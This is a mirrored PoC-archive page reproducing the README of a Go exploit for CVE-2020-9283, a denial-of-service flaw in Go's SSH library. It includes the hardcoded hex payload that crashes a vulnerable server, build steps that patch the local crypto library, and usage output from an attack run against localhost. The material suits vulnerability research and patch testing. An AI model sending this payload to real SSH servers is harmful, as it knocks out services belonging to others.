目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2020-9283 PoC — Golang Go crypto 数据伪造问题漏洞

来源
https://github.com/brompwnie/CVE-2020-9283
关联漏洞
标题:Golang Go crypto 数据伪造问题漏洞 (CVE-2020-9283)
Description:Golang Go crypto是Golang社区的一款基于 Go 语言的加密代码库。 Golang SSH Package v0.0.0-20200220183623-bac4c82f6975之前版本(Go)中存在数据伪造问题漏洞。攻击者可利用该漏洞导致拒绝服务。
Description
Exploit for CVE-2020-9283 based on Go
介绍
# Exploit for CVE-2020-9283  

This project is inspired by the original POC found here github.com/mark-adams/exploits/CVE-2020-9283.
I was curious as to how the Go SSH library was implemented so decided to implement the PoC using go.

A short writeup can be found here https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

# What does this do?

This invokes a panic on a Go based SSH server which may lead to a DoS. 

# Installation

I've released binaries in the Release section however you can rebuild your own using the source code attached.

## Building the sources
I decided to modify the Go crypto library directly on my system to understand how it works, this is not ideal and probably not the best way to do this but it works ;) If you want to rebuild using GO modules, replace the contents of the Crypto/ssh files client_auth.go, handshake.go, transport.go on your local system with the ".bak" files located here. These modified files contain verbose debugging output and a hardcoded payload of "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" which triggers the panic.

# Usage
You will see lots of debugging output and "errors", this is expected. If your target has panic'd, you should see errors associated to "bad key lengths". If you want to test this locally, use the vulnerable code that can be found here github.com/mark-adams/exploits/CVE-2020-9283

```
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
./CVE-2020-9283 -port=2022
+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

```
文件快照

 [4.0K]  /data/pocs/0a3142ae02d3b8a652d8b087e9e865f96738d61b
├── [ 20K]  client_auth.go.bak
├── [8.7K]  client.go.bak
├── [ 115]  go.mod
├── [ 824]  go.sum
├── [ 16K]  handshake.go.bak
├── [1.7K]  main.go
├── [1.5K]  Makefile
├── [2.0K]  README.md
└── [9.3K]  transport.go.bak

0 directories, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →